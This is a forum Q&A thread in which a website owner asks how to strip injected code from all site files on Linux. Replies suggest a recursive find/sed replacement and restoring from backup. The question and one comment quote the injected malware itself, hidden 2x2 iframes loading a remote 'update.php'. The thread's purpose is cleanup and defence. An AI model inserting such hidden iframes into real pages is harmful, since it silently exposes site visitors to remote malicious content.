# Code injection help search and replace on linux

Tags: php, linux

My website has been hacked and injected some of the code like this

```
<i>
    <iframe src="http://www.cascadecowcutters.org/wp-content/upgrade/update.php" width="2" height="2" frameborder="0"></iframe><iframe src="http://www.cascadecowcutters.org/wp-content/upgrade/update.php" width="2" height="2" frameborder="0"></iframe>
</i>
```

Is there a way in linux  to search and replace this code to this ''? recursively

Comment: You can use `sed` but you are probably better off restoring from backup as you can never know exactly what has been done by the hacker.

Comment: so we have to fill in the blanks?

Comment: The only option with a compromised server is nuke from orbit, and pray your backups are good.

Comment: Has this been injected into HTML files? In database templates? In cache?...

Answer (score 0):

To 'find' all files and search and replace on those files:

`find ./ -type f | xargs sed -i 's/string1/string2/g'`

As Joakim mentioned in his comment, anytime you are dealing with a compromised server it is safest to do a complete wipe <> restore. Before restoration make sure to check for exploits. Make sure you know all your web apps are at their most recent version.

Comment: this is the code that they injected to all my site files.... <code><iframe src="http://www.cascadecowcutters.org/wp-content/upgrade/update.php" width="2" height="2" frameborder="0"></iframe><iframe src="http://www.cascadecowcutters.org/wp-content/upgrade/update.php" width="2" height="2" frameborder="0"></iframe></code> sorry about my first post..... so do i need to do like this in terminal find ./ -type f | xargs sed -i 's/INJECTED CODE/WHITSPACE/g'

Comment: @Monski `INJECTED CODE` should be properly escaped to work in a Regexp